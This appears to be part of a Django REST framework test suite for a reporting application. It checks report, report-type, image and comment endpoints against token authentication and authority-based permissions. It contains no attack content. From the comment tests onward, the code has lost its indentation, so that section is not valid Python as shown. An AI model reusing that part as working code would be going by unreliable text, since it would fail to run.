        self.assertEqual(response_json['reportTypeId'], self.report1.type.id)
        self.assertEqual(response_json['reportTypeName'], self.report1.type.name)
        self.assertEqual(response_json['date'], self.report1.date.isoformat() + '+00:00')
        self.assertEqual(response_json['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
        self.assertEqual(response_json['administrationAreaId'], self.report1.administration_area.id)
        # self.assertEqual(response_json['remark'], self.report1.remark)
        self.assertEqual(response_json['negative'], self.report1.negative)
        self.assertEqual(response_json['formData'], json.loads(self.report1.form_data))
        self.assertEqual(response_json['images'][0]['imageUrl'], image.image_url)
        self.assertEqual(response_json['images'][0]['thumbnailUrl'], image.thumbnail_url)
        self.assertEqual(response_json['images'][0]['note'], image.note)
        self.assertEqual(response_json['createdBy'], self.report1.created_by.get_full_name())
        self.assertEqual(response_json['createdByContact'], self.report1.created_by.contact)

    def test_cannot_get_api_get_report_if_user_dont_have_authorized_on_report_type(self):
        """An outsider (no authority) cannot read the report (HTTP 403)."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[self.report1.id]))
        self.assertEqual(response.status_code, 403)

    # Disabled tests kept as a bare string expression (no-op).
    # NOTE(review): the first disabled test asserts status 403 and then
    # reads 'id' from the body — contradictory; fix before re-enabling.
    '''
    def test_api_get_report_that_area_is_child_of_permitted_administration_area(self):
        area = self.area1.add_child(name='Namsan', location=self.area1.location)
        report = factory.create_report(type=self.type1, administration_area=area)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[report.id]))
        self.assertEqual(response.status_code, 403)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['id'], report.id)

    def test_api_get_report_that_area_is_child_of_permitted_administration_area_with_authority(self):
        area = self.area1.add_child(name='Namsan', location=self.area1.location)
        report = factory.create_report(type=self.type1, administration_area=area)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[report.id]))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['id'], report.id)
    '''

    def test_cannot_get_api_get_report_if_user_dont_have_authorized_on_adminstration_area(self):
        """Report-type access alone is not enough: the user must also be
        permitted on the report's administration area."""
        group_r = factory.add_user_to_new_group_type_report_type(user=self.jessica)
        factory.create_group_report_type(group=group_r, report_type=self.type1)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[self.report1.id]))
        self.assertEqual(response.status_code, 403)

    def test_cannot_get_api_get_report_that_administration_area_group_is_not_has_role_reporter(self):
        """ALERT-type (non-reporter) area group membership does not grant
        read access, even for the report's own creator."""
        group_a = factory.add_user_to_new_group(user=self.taeyeon,
            type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
        area = factory.create_administration_area()
        factory.create_group_administration_area(group=group_a, administration_area=area)
        report = factory.create_report(created_by=self.taeyeon, type=self.type1,
            administration_area=area)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[report.id]))
        self.assertEqual(response.status_code, 403)

    def test_staff_can_get_api_report(self):
        """A staff/superuser account can read any report."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[self.report1.id]))
        self.assertEqual(response.status_code, 200)

    def test_cannot_get_api_get_report_if_not_exists(self):
        """A non-existent report id yields HTTP 404."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('report-detail', args=[self.report1.id+1000000]))
        self.assertEqual(response.status_code, 404)

    def test_anonymous_cannot_access_api_get_report(self):
        """Unauthenticated GET is rejected with HTTP 401."""
        response = self.client.get(reverse('report-detail', args=[self.report1.id]))
        self.assertEqual(response.status_code, 401)
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportTypeList(APITestCase):
    """Tests for the report-type list endpoint (``reporttype-list``).

    Visibility rules exercised here: a user sees the report types owned by
    every authority he belongs to; ``authority_1`` inherits the other two,
    so its member (taeyeon) sees all three types; staff see everything;
    users with no grants get an empty list.

    Fix applied: ``dict.has_key`` (removed in Python 3, deprecated in 2.x)
    replaced with ``assertNotIn`` / the ``in`` operator.
    """

    def setUp(self):
        # The application expects a sentinel report type with id=0 to exist;
        # create it only if it is not already present.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0
            )
        call_command('clear_index', interactive=False, verbosity=0)
        call_command('clear_graph', interactive=False, verbosity=0)
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user()
        self.minah = factory.create_user(is_superuser=True, is_staff=True)
        self.krystal = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.krystal)
        self.authority_1 = factory.create_authority()
        self.authority_1.users.add(self.taeyeon)
        self.authority_2 = factory.create_authority()
        self.authority_2.users.add(self.jessica)
        self.type1 = factory.create_report_type(name='VX-2014', authority=self.authority)
        self.type2 = factory.create_report_type(name='Human', authority=self.authority)
        self.type3 = factory.create_report_type(name='Animal', authority=self.authority_2)
        # authority_1 inherits both others, so its members see all types.
        self.authority_1.inherits.add(self.authority)
        self.authority_1.inherits.add(self.authority_2)

    def _login(self, user):
        # Authenticate the test client with the user's token.
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + user.auth_token.key)

    def _assert_type(self, item, report_type):
        # The list payload carries id/name/version for each visible type.
        self.assertEqual(item['id'], report_type.id)
        self.assertEqual(item['name'], report_type.name)
        self.assertEqual(item['version'], report_type.version)

    def test_api_list_report_type(self):
        """A member of the inheriting authority sees all three report types."""
        self._login(self.taeyeon)
        response = self.client.get(reverse('reporttype-list'))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 3)
        for item, report_type in zip(response_json,
                                     [self.type1, self.type2, self.type3]):
            self._assert_type(item, report_type)
        # The heavy form definition is omitted from the list payload.
        self.assertNotIn('definition', response_json[0])

    def test_api_list_report_type_with_authority(self):
        """A direct member of ``authority`` sees only that authority's types."""
        self._login(self.krystal)
        response = self.client.get(reverse('reporttype-list'))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 2)
        for item, report_type in zip(response_json, [self.type1, self.type2]):
            self._assert_type(item, report_type)
        self.assertNotIn('definition', response_json[0])

    def test_api_list_report_type_only_has_permission_on_those_report_types(self):
        """jessica belongs to authority_2 only, so she sees just type3."""
        self._login(self.jessica)
        response = self.client.get(reverse('reporttype-list'))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 1)
        self._assert_type(response_json[0], self.type3)

    def test_api_list_report_type_only_group_has_role_reporter(self):
        """A report-type group without the reporter role adds no visibility."""
        group_r = factory.add_user_to_new_group(user=self.taeyeon,
                        type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
        newtype = factory.create_report_type()
        factory.create_group_report_type(group=group_r, report_type=newtype)
        self._login(self.taeyeon)
        response = self.client.get(reverse('reporttype-list'))
        self.assertEqual(response.status_code, 200)
        # Still only the 3 authority-visible types, not ``newtype``.
        self.assertEqual(len(json.loads(response.content)), 3)

    def test_api_list_report_type_return_empty_list_if_not_have_any_permission(self):
        """A user with no authority membership gets an empty list, not 403."""
        self._login(self.yoona)
        response = self.client.get(reverse('reporttype-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(json.loads(response.content)), 0)

    def test_staff_can_get_all_api_list_report_type(self):
        """Staff/superusers see every report type."""
        self._login(self.minah)
        response = self.client.get(reverse('reporttype-list'))
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(json.loads(response.content)), 3)

    def test_anonymous_cannot_access_api_list_reports(self):
        """Unauthenticated requests are rejected with 401."""
        response = self.client.get(reverse('reporttype-list'))
        self.assertEqual(response.status_code, 401)
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportType(APITestCase):
    """Tests for the report-type detail endpoint (``reporttype-detail``)."""

    def setUp(self):
        # The application expects a sentinel report type with id=0 to exist;
        # create it only if it is not already present.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user(is_staff=True, is_superuser=True)
        self.krystal = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.krystal)
        self.type1 = factory.create_report_type(authority=self.authority)
        self.type2 = factory.create_report_type(authority=self.authority)

    def _login(self, user):
        # Authenticate the test client with the user's token.
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + user.auth_token.key)

    def _get_detail(self, type_id):
        # Fetch the detail endpoint for the given report-type id.
        return self.client.get(reverse('reporttype-detail', args=[type_id]))

    def _assert_full_payload(self, response):
        # Detail responses expose the complete type, including the template
        # and the parsed form definition.
        body = json.loads(response.content)
        self.assertEqual(body['id'], self.type1.id)
        self.assertEqual(body['name'], self.type1.name)
        self.assertEqual(body['version'], self.type1.version)
        self.assertEqual(body['template'], self.type1.template)
        self.assertEqual(body['definition'], json.loads(self.type1.form_definition))

    def test_api_get_report_type(self):
        """An authority member can read the full report-type payload."""
        self._login(self.taeyeon)
        response = self._get_detail(self.type1.id)
        self.assertEqual(response.status_code, 200)
        self._assert_full_payload(response)

    def test_api_get_report_type_with_authority(self):
        """Another member of the same authority gets the same payload."""
        self._login(self.krystal)
        response = self._get_detail(self.type1.id)
        self.assertEqual(response.status_code, 200)
        self._assert_full_payload(response)

    def test_cannot_get_api_get_report_type_if_user_dont_have_authorized(self):
        """A user outside the authority is forbidden."""
        self._login(self.jessica)
        self.assertEqual(self._get_detail(self.type1.id).status_code, 403)

    def test_cannot_get_api_get_report_type_if_group_is_not_has_role_reporter(self):
        """A report-type group without the reporter role grants no access."""
        group_r = factory.add_user_to_new_group(user=self.taeyeon,
                        type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
        newtype = factory.create_report_type()
        factory.create_group_report_type(group=group_r, report_type=newtype)
        self._login(self.taeyeon)
        self.assertEqual(self._get_detail(newtype.id).status_code, 403)

    def test_cannot_get_api_get_report_type_if_not_exists(self):
        """A missing id yields 404."""
        self._login(self.jessica)
        self.assertEqual(self._get_detail(self.type1.id + 100).status_code, 404)

    def test_staff_can_get_api_get_report(self):
        """Staff users can read any report type."""
        self._login(self.yoona)
        self.assertEqual(self._get_detail(self.type1.id).status_code, 200)

    def test_anonymous_cannot_access_api_get_reports(self):
        """Unauthenticated requests are rejected with 401."""
        self.assertEqual(self._get_detail(self.type1.id).status_code, 401)
class TestApiReportImageCreate(APITestCase):
    """Tests for attaching images to an existing report (``add_report_image``)."""

    def setUp(self):
        # The application expects a sentinel report type with id=0 to exist;
        # create it only if it is not already present.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        call_command('clear_index', interactive=False, verbosity=0)
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.report = factory.create_report(created_by=self.taeyeon)

    def _login(self, user):
        # Authenticate the test client with the user's token.
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + user.auth_token.key)

    def test_post_api_report_image(self):
        """A valid payload creates a ReportImage and echoes it back."""
        self._login(self.taeyeon)
        imageUrl = 'https://s3-ap-southeast-1.amazonaws.com/podd/fe97493f-fef7-4e8e-9b97-a179c43bd5fa'
        payload = {
            "reportGuid": self.report.guid,
            "guid": "dfdfdf0003434300343",
            "imageUrl": imageUrl,
            "thumbnailUrl": imageUrl,
            "note": "fever",
            "location": 'POINT(100.7522060000000010 13.8082770000000004)'
        }
        response = self.client.post(reverse('add_report_image'), payload)
        self.assertEqual(response.status_code, 201)
        body = json.loads(response.content)
        self.assertEqual(body['guid'], 'dfdfdf0003434300343')
        self.assertEqual(body['imageUrl'], imageUrl)
        self.assertEqual(body['thumbnailUrl'], imageUrl)
        self.assertEqual(body['note'], 'fever')
        # WKT POINT is "(longitude latitude)"; the API splits the pair out.
        self.assertEqual(body['location']['latitude'], 13.8082770000000004)
        self.assertEqual(body['location']['longitude'], 100.7522060000000010)
        stored = ReportImage.objects.latest('id')
        self.assertEqual(stored.report, self.report)
        self.assertEqual(stored.guid, 'dfdfdf0003434300343')
        self.assertEqual(stored.image_url, imageUrl)
        self.assertEqual(stored.thumbnail_url, imageUrl)
        self.assertEqual(stored.note, 'fever')

    def test_post_api_report_image_invalid(self):
        """Missing fields are reported per-field with HTTP 400."""
        self._login(self.taeyeon)
        # No payload at all: the target report cannot be resolved.
        response = self.client.post(reverse('add_report_image'))
        self.assertEqual(response.status_code, 400)
        self.assertEqual(json.loads(response.content)['reportGuid'],
                         'Report is not found.')
        # Resolvable report but no image fields: field-level errors.
        response = self.client.post(reverse('add_report_image'),
                                    {"reportGuid": self.report.guid})
        self.assertEqual(response.status_code, 400)
        errors = json.loads(response.content)
        self.assertEqual(errors['guid'], ['This field is required.'])
        self.assertEqual(errors['imageUrl'], ['This field is required.'])
        self.assertEqual(errors['thumbnailUrl'], ['This field is required.'])

    def test_anonymous_cannot_access_api_report_image_create(self):
        """Unauthenticated requests are rejected with 401."""
        response = self.client.post(reverse('add_report_image'))
        self.assertEqual(response.status_code, 401)
class TestApiReportImageUpload(APITestCase):
    """Tests for the raw image upload endpoint (``upload_report_image``)."""

    def setUp(self):
        # The application expects a sentinel report type with id=0 to exist;
        # create it only if it is not already present.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        # get_temporary_file()

    @patch('reports.api.upload_to_s3', mock_upload_to_s3)
    def test_post_image_upload(self):
        """A multipart image upload returns the stored image/thumbnail URLs."""
        self.client.credentials(
            HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        m = mock_open()
        with patch('__main__.open', m, create=True):
            send_file = open('/tmp/hello.world.jpg', 'r')
            body = encode_multipart('BoUnDaRyStRiNg', {'image': send_file})
            content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
            response = self.client.post(reverse('upload_report_image'), body,
                                        content_type=content_type)
            self.assertEqual(response.status_code, 200)
            payload = json.loads(response.content)
            self.assertEqual(payload['imageUrl'], 'hello.world.jpg')
            self.assertEqual(payload['thumbnailUrl'], 'hello.world-thumbnail.jpg')

    def test_cannot_get_upload_report_image(self):
        """The endpoint only accepts POST; GET is 405."""
        self.client.credentials(
            HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('upload_report_image'))
        self.assertEqual(response.status_code, 405)

    def test_anonymous_cannot_post_upload_report_image(self):
        """Unauthenticated requests are rejected with 401."""
        response = self.client.post(reverse('upload_report_image'))
        self.assertEqual(response.status_code, 401)
class TestApiReportComment(APITestCase):
    def setUp(self):
        # The application expects a sentinel "positive" report type with id=0;
        # create it only if an earlier test has not already done so.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        # Management command that clears the search index between tests.
        call_command('clear_index', interactive=False, verbosity=0)
        # taeyeon and krystal are members of the authority that owns both the
        # report type and the administration area; jessica and yoona hold no
        # grants and are used as the "forbidden" / mentioned users.
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user()
        self.krystal = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.krystal)
        self.type = factory.create_report_type(authority=self.authority)
        self.area = factory.create_administration_area(authority=self.authority)
        # The single report that every comment test targets, owned by taeyeon.
        self.report = factory.create_report(created_by=self.taeyeon, type=self.type,
            administration_area=self.area)
def test_post_api_report_comment_by_report_without_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.taeyeon)
def test_post_api_report_comment_by_report_without_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.krystal)
def test_post_api_report_comment_by_report_comment_without_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello baby",
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.taeyeon)
def test_post_api_report_comment_by_report_comment_without_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello baby",
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, None)
self.assertEqual(comment.created_by, self.krystal)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_with_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('report-comment', args=[self.report.id]), content, content_type=content_type)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.taeyeon)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_with_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('report-comment', args=[self.report.id]), content, content_type=content_type)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.krystal)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_comment_with_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"reportId": self.report.id,
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('reportcomment-list'), content, content_type=content_type)
send_file.closed
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.taeyeon)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_comment_with_file_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello.world.jpg', 'r')
params = {
"reportId": self.report.id,
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('reportcomment-list'), content, content_type=content_type)
send_file.closed
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello baby')
self.assertEqual(response_json['fileUrl'], 'hello.world.jpg')
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
self.assertEqual(comment.file_url, 'hello.world.jpg')
self.assertEqual(comment.created_by, self.krystal)
'''
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_with_large_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello_large.world', 'r')
params = {
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('report-comment', args=[self.report.id]), content, content_type=content_type)
self.assertEqual(response.status_code, 400)
@patch('reports.api.upload_to_s3', mock_upload_to_s3)
def test_post_api_report_comment_by_report_comment_with_large_file(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
m = mock_open()
with patch('__main__.open', m, create=True):
send_file = open('/tmp/hello_large.world', 'r')
params = {
"reportId": self.report.id,
"message": "Hello baby",
"file": send_file,
}
content = encode_multipart('BoUnDaRyStRiNg', params)
content_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
response = self.client.post(reverse('reportcomment-list'), content, content_type=content_type)
self.assertEqual(response.status_code, 400)
'''
def test_post_api_report_comment_wih_user_cannot_access_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 403)
def test_post_api_report_comment_wih_user_cannot_access_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello baby",
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 403)
'''
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "I am Back",
}
response = self.client.post(reverse('report-comment', args=[report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report_with_authority(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "I am Back",
}
response = self.client.post(reverse('report-comment', args=[report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report_comment(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "I am Back",
"reportId": report.id,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
def test_post_api_report_comment_on_area_that_child_of_permitted_administration_area_by_report_comment_with_authority(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "I am Back",
"reportId": report.id,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], report.id)
self.assertEqual(response_json['message'], 'I am Back')
'''
def test_post_api_report_mention_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mention_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mentions_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.taeyeon)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.taeyeon)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_mentions_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
